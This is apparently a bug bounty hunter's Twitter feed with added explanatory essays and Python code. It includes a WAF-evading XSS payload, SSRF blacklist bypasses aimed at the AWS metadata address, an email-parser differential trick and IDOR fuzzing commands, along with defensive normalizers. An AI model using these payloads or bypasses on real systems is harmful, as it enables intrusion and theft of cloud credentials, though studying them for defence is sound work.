Nick || hunt4p1zza

@ngkogkos

I find bugs for 🍕.

United Kingdom
Joined December 2011

Tweets


  1. Pinned Tweet
    19 Oct 2019

    Just ate a well-known WAF for breakfast. <form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));// See picture for detailed explanation and tips. Kudos: , , .

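The pinned payload above gets past a signature-based WAF because the strings the rules look for (eval, atob, alert) never appear literally: one is split across two string literals, one is written with \xNN escapes, and the final alert is base64 inside a template literal. The following Python block is an added example, not code from the tweet author: it copies the payload from the tweet, runs a hypothetical substring-signature check against it (the kind of rule such a WAF applies; the signature list is an assumption), then canonicalizes the payload by resolving the hex escapes, folding the string concatenation and decoding the base64 literal, so that the same signature check now matches.

```python
import base64
import re

# Copy of the XSS vector shown in the tweet above; everything else in this
# block is an added example, not the tweet author's code.
PAYLOAD = (
    "<form><button formaction=javascript:top['ev'+'al']"
    "(self['\\x61\\x74\\x6f\\x62'](`YWxlcnQoMSk7`));//"
)

# Hypothetical signature list standing in for a naive WAF rule set
# (assumption: substring matching on the raw request).
NAIVE_SIGNATURES = ("eval(", "atob(", "alert(")


def naive_waf_blocks(payload: str) -> bool:
    """Substring-signature check on whatever text it is handed."""
    lower = payload.lower()
    return any(sig in lower for sig in NAIVE_SIGNATURES)


def unescape_js_hex(s: str) -> str:
    """Resolve JavaScript \\xNN escapes: '\\x61\\x74\\x6f\\x62' -> 'atob'."""
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), s)


def join_string_concats(s: str) -> str:
    """Fold 'ev'+'al' style concatenation of string literals into 'eval'."""
    pattern = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while True:
        new = pattern.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if new == s:
            return s
        s = new


def decode_base64_literals(s: str) -> str:
    """Replace backtick-delimited base64 literals with their decoded text."""
    def repl(m):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode()
            return "`" + decoded + "`"
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # not valid base64, leave it alone
    return re.sub(r"`([A-Za-z0-9+/=]+)`", repl, s)


def normalize(payload: str) -> str:
    """Canonical form a WAF should match against instead of the raw bytes."""
    return decode_base64_literals(join_string_concats(unescape_js_hex(payload)))


if __name__ == "__main__":
    print("naive WAF blocks raw payload:   ", naive_waf_blocks(PAYLOAD))
    print("normalized payload:             ", normalize(PAYLOAD))
    print("naive WAF blocks normalized one:", naive_waf_blocks(normalize(PAYLOAD)))
```

The normalizer only handles the three obfuscations used in this particular payload; the point of the example is that matching on raw bytes is the wrong layer, not that these three rewrites make a filter complete. A real JavaScript engine has many more spellings for the same property access (unicode escapes, `String.fromCharCode`, computed keys), which is why output encoding and a Content Security Policy, rather than request filtering, are the actual fix.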
  2. Retweeted
    4 Feb

    If, during your scans, the Backslash Powered Scanner plugin finds something like this, try changing the COM1 value to different numerical values; the result may surprise you. In this way I was able to extract registered users from an application.

  3. Retweeted
    3 Feb

    When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the Host header completely. This has worked to bypass several SSRF fixes in the past.

  4. Retweeted
    4 Feb

    When testing for SSRF using a blacklist, take internal IP addresses and, when encoding them, don't encode the entire IP. Encode 1 octet of the IP address, or 2 or 3. For instance: AWS Metadata - 0251.254.169.254 (this got the $160,000 payout in Oct 2018)

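The reason 0251.254.169.254 works is that the blacklist compares strings while the network stack parses numbers: inet_aton() reads a component with a leading 0 as octal (0251 = 169), a 0x prefix as hex, and also accepts three-, two- and one-component forms where the last number fills the remaining bytes. The block below is an added example, not the tweet author's code: it implements those inet_aton rules in Python (the parsing rules are the classic BSD inet_aton behaviour, which is an assumption about the target's resolver), shows that a hypothetical string blacklist misses every alternate spelling, and shows the fix, canonicalizing the host before the comparison. It goes beyond the tweet's single example by covering the hex, three-part and bare-integer forms too.

```python
import ipaddress
import re

# Hypothetical blacklist standing in for the check the tweet bypasses:
# a literal string comparison against the raw host component of the URL.
BLACKLIST = {"169.254.169.254", "127.0.0.1", "0.0.0.0"}


def _parse_part(part: str) -> int:
    """One inet_aton numeric component: 0x.. hex, leading-0 octal, else decimal."""
    if not re.fullmatch(r"0[xX][0-9a-fA-F]+|[0-9]+", part):
        raise ValueError(f"bad component: {part!r}")
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def inet_aton_canonical(host: str) -> str:
    """Dotted-quad for any form BSD inet_aton() accepts (assumed rules):
    a, a.b, a.b.c or a.b.c.d; octal/hex components; the last component
    fills all remaining bytes. Raises ValueError for non-numeric hosts."""
    parts = [_parse_part(p) for p in host.split(".")]
    if not 1 <= len(parts) <= 4:
        raise ValueError("too many components")
    *lead, last = parts
    for v in lead:
        if v > 0xFF:
            raise ValueError("leading component out of range")
    width = 4 - len(lead)  # bytes the last component has to fill
    if last >= 1 << (8 * width):
        raise ValueError("last component out of range")
    value = 0
    for v in lead:
        value = (value << 8) | v
    value = (value << (8 * width)) | last
    return str(ipaddress.IPv4Address(value))


def blocked_by_string_blacklist(host: str) -> bool:
    """The weak check: compares the raw string only."""
    return host in BLACKLIST


def blocked_after_canonicalization(host: str) -> bool:
    """The fix: canonicalize first, then compare."""
    try:
        return inet_aton_canonical(host) in BLACKLIST
    except ValueError:
        # Not a numeric literal; a real fix resolves the name and checks
        # every returned address against the blacklist (not shown here).
        return False


if __name__ == "__main__":
    # Constructed alternate spellings of the AWS metadata address.
    for h in ("0251.254.169.254", "169.0376.169.254", "0251.0376.0251.0376",
              "0xa9.254.169.254", "169.254.43518", "2852039166"):
        print(f"{h:22} -> {inet_aton_canonical(h):16}"
              f" string-blacklist={blocked_by_string_blacklist(h)!s:5}"
              f" canonical-blacklist={blocked_after_canonicalization(h)}")
```

Note that canonicalizing the literal is necessary but not sufficient: the same bypass class reappears through DNS (a hostname resolving to 169.254.169.254, or rebinding between the check and the fetch) and through redirects, so the comparison has to happen on the address the HTTP client actually connects to.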
  5. 3 Feb

    Do you have a big file w/ URLs w/ many of them being default pages, wildcards etc.? Use 's get-title hack to grep out common titles: cat urls.txt | get-title -c 300 > titles.txt; cat titles.txt | grep -v "PATTERN" | awk -F '[()]' '{print $2}'

  6. Retweeted
    3 Feb

    Give a man an open redirect, and you feed him for a day. Teach a man to chain open redirects with other bugs, and you feed him for a lifetime.

  7. 2 Feb
  8. Retweeted
    1 Feb

    It's a little different from what I thought. The overall function is similar to the taborator, but it may be useful if you are configuring the private collaborator. I think it's cool that the collaborator stays even after the session ends 👍 cc)

  9. Retweeted
  10. 30 Jan

    IDEA 💡 To create a web app vuln scanning framework with from . This can be simply a bash script with many scanning functions (files, SQLi etc.), essentially multiple wrappers over . I will be away from my PC a lot in the following months, so I may write it on paper.

  11. 29 Jan
  12. Retweeted
    28 Jan

    Hey everyone, we are looking for speakers for this year. If you have any interesting topic to speak about and want to try how it feels to be on the stage just DM this account or shoot an email to any of CZ chapter leaders. RTs are appreciated.

  13. Retweeted
    27 Jan

    Practicing or on a daily basis? Based in in Europe? Don't miss the opportunity to take my Burp Suite Pro training in 2020, either in Geneva (March) or Amsterdam (April)

  14. Retweeted
    27 Jan

    Did you know that the address '<a@b.com>c@d.com' when given to SES will send an email to a@b.com? This could lead to interesting exploit scenarios with some email parsing libraries/code

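The exploit scenario the tweet hints at is a parser differential: the application validates one interpretation of the address string while the mail service delivers to another. The block below is an added example, not the tweet author's code, and it does not call SES (the delivery behaviour is as the tweet states). It constructs a hypothetical allow-list check that takes the domain after the last "@", a sender-side parser that takes the bracketed mailbox the way a lenient angle-addr parser does, and a strict check that validates exactly the mailbox that will be delivered to and rejects anything with trailing junk. The allow-list and the two parsers are assumptions made for the illustration.

```python
import re

# Input from the tweet above; everything else in this block is constructed
# for the example and is not the tweet author's code.
ADDR = "<a@b.com>c@d.com"

# Hypothetical allow-list enforced by the application before it hands the
# address to the mail service.
ALLOWED_DOMAINS = {"d.com"}

# Accepts one mailbox, optionally inside angle brackets, and nothing else.
_STRICT_MAILBOX = re.compile(
    r"\s*(?:<([^<>@\s]+@[^<>@\s]+)>|([^<>@\s]+@[^<>@\s]+))\s*"
)


def domain_of_last_mailbox(addr: str) -> str:
    """Naive validator: whatever follows the last '@' is 'the domain'."""
    return addr.rsplit("@", 1)[-1].strip().lower()


def application_allows(addr: str) -> bool:
    """The weak check: validates the domain it sees, not the one delivered to."""
    return domain_of_last_mailbox(addr) in ALLOWED_DOMAINS


def angle_addr_recipient(addr: str) -> str:
    """Sender-side parser modelled on a lenient RFC 5322 angle-addr reader:
    if '<...>' is present, the mailbox inside the brackets is the recipient
    and the surrounding text is treated as display name or ignored."""
    m = re.search(r"<([^<>]+)>", addr)
    return (m.group(1) if m else addr).strip()


def strict_allows(addr: str) -> bool:
    """Hardened check: the whole string must be a single mailbox (bare or in
    brackets), and the allow-list is applied to that mailbox only, so what is
    validated and what is delivered to cannot differ."""
    m = _STRICT_MAILBOX.fullmatch(addr)
    if not m:
        return False
    mailbox = m.group(1) or m.group(2)
    return mailbox.rsplit("@", 1)[-1].lower() in ALLOWED_DOMAINS


if __name__ == "__main__":
    print("application allows:    ", application_allows(ADDR))
    print("sender delivers to:    ", angle_addr_recipient(ADDR))
    print("strict check allows:   ", strict_allows(ADDR))
```

The general rule this illustrates: normalize the address to the exact form the downstream component will use, validate that form, and pass only that form on; never validate one string and send another.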
  15. 23 Jan
  16. Retweeted
    22 Jan

    New blog post: A Less Known Attack Vector, Second Order IDOR Attacks

  17. 21 Jan

    I've been followed by , my career is now fulfilled and I can retire 😊.

  18. Retweeted
    20 Jan

    Here's how the new Taborator feature works if my RT wasn't clear. If you send a request like: This will colour the interaction green in Taborator and add a comment of Chrome and change the text colour to white.

  19. 20 Jan

    I am thinking... I need a password manager for my master passwords. Having split password databases with different master passwords for isolation reasons is not great when you realise you have to remember multiple complex passphrases that you may end up forgetting one day.

  20. 19 Jan

    To process JSON results output by ffuf you can use the jq tool. You can use a bash alias similar to below depending on your needs: alias jqffuf="jq -r '.results[] | [.url,.redirectlocation,.status,.length] | \"\(.[0]) -> \(.[1]) \(.[2]) \(.[3])\"'"

  21. 19 Jan

    If you want to fuzz sequential numbers when looking for , you can easily do this with . Here's a real (sanitised) example in bash: $ seq 1000 8000 | ffuf -u -o ffuf_idor.txt -v -w -

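The two tweets above (tweets 20 and 21) are one workflow: generate a sequential ID wordlist with seq, feed it to ffuf through -w -, write the results as JSON with -o, then pull the url/redirectlocation/status/length columns out with jq. The block below is an added example, not the tweet author's code, that does the same in Python so the output can be post-processed further: it generates the wordlist for piping into ffuf, parses a constructed sample of ffuf's JSON output (the field names are the ones the jq alias uses; the rows themselves are made up, and the URL and IDs are placeholders), prints the same columns as the alias, and lists the IDs whose responses did not look like a denial, which are the ones worth checking by hand for IDOR.

```python
import json
import sys

# Constructed sample of ffuf's -o JSON output. Field names match the ones the
# jqffuf alias reads; the host, IDs, statuses and lengths are made up.
SAMPLE_FFUF_JSON = json.dumps({
    "results": [
        {"url": "https://target.example/api/orders/1000",
         "redirectlocation": "", "status": 200, "length": 512},
        {"url": "https://target.example/api/orders/1001",
         "redirectlocation": "", "status": 403, "length": 41},
        {"url": "https://target.example/api/orders/1002",
         "redirectlocation": "/login", "status": 302, "length": 0},
        {"url": "https://target.example/api/orders/1003",
         "redirectlocation": "", "status": 200, "length": 508},
    ]
})

# Responses that mean "not yours" for the hypothetical target; anything else
# returned for an ID we do not own is an IDOR candidate.
DENIAL_STATUSES = {401, 403, 302, 404}


def seq_wordlist(start: int, end: int) -> str:
    """Same text `seq start end` produces, one ID per line, for ffuf -w -."""
    return "".join(f"{i}\n" for i in range(start, end + 1))


def summarize(ffuf_json: str) -> list[str]:
    """One line per result in the jqffuf layout: url -> redirect status length."""
    results = json.loads(ffuf_json)["results"]
    return [f"{r['url']} -> {r['redirectlocation']} {r['status']} {r['length']}"
            for r in results]


def idor_candidates(ffuf_json: str, denials=DENIAL_STATUSES) -> list[str]:
    """IDs (last path segment) whose response was not a denial."""
    results = json.loads(ffuf_json)["results"]
    return [r["url"].rstrip("/").rsplit("/", 1)[-1]
            for r in results if r["status"] not in denials]


def length_histogram(ffuf_json: str) -> dict[int, int]:
    """Count of responses per body length; rare lengths are the outliers to
    inspect first when a scan returns thousands of near-identical rows."""
    hist: dict[int, int] = {}
    for r in json.loads(ffuf_json)["results"]:
        hist[r["length"]] = hist.get(r["length"], 0) + 1
    return hist


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # Usage: python3 this.py 1000 8000 | ffuf -u <url>/FUZZ -w - -o out.json
        sys.stdout.write(seq_wordlist(int(sys.argv[1]), int(sys.argv[2])))
    else:
        for line in summarize(SAMPLE_FFUF_JSON):
            print(line)
        print("IDOR candidates:", idor_candidates(SAMPLE_FFUF_JSON))
        print("length histogram:", length_histogram(SAMPLE_FFUF_JSON))
```

To run it on a real scan, replace SAMPLE_FFUF_JSON with the contents of the file ffuf wrote with -o, and adjust DENIAL_STATUSES to whatever the target returns for an object you are not authorized to see; a 200 with a different length than your own objects is the usual tell.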